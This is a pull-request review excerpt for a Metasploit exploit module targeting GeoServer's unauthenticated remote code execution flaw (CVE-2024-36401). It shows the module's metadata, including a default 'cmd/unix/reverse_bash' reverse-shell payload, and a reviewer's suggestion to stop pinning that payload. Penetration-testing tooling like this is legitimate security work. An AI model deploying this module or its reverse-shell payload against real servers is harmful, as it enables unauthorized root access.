modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb

```diff
@@ -0,0 +1,206 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Geoserver unauthenticated Remote Code Execution',
+        'Description' => %q{
+          GeoServer is an open-source software server written in Java that provides
+          the ability to view, edit, and share geospatial data.
+          It is designed to be a flexible, efficient solution for distributing geospatial data
+          from a variety of sources such as Geographic Information System (GIS) databases,
+          web-based data, and personal datasets.
+          In the GeoServer versions < 2.23.6, >= 2.24.0, < 2.24.4 and >= 2.25.0, < 2.25.1,
+          multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users
+          through specially crafted input against a default GeoServer installation due to unsafely
+          evaluating property names as XPath expressions.
+          An attacker can abuse this by sending a POST request with a malicious xpath expression
+          to execute arbitrary commands as root on the system.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
+          'jheysel-r7', # MSF module Windows support
+          'Steve Ikeoka' # Discovery
+        ],
+        'References' => [
+          ['CVE', '2024-36401'],
+          ['URL', 'https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv'],
+          ['URL', 'https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401'],
+          ['URL', 'https://attackerkb.com/topics/W6IDY2mmp9/cve-2024-36401']
+        ],
+        'DisclosureDate' => '2024-07-01',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_AARCH64, ARCH_ARMLE],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
```

Comment:
We've been moving away from the pattern of pinning a default payload to each target. Unless of course there's a known issue with the default payload the framework selects. 

Spencer explains it best here: https://github.com/rapid7/metasploit-framework/pull/18997#discussion_r1570978495
```suggestion
              # Tested with cmd/unix/reverse_bash
```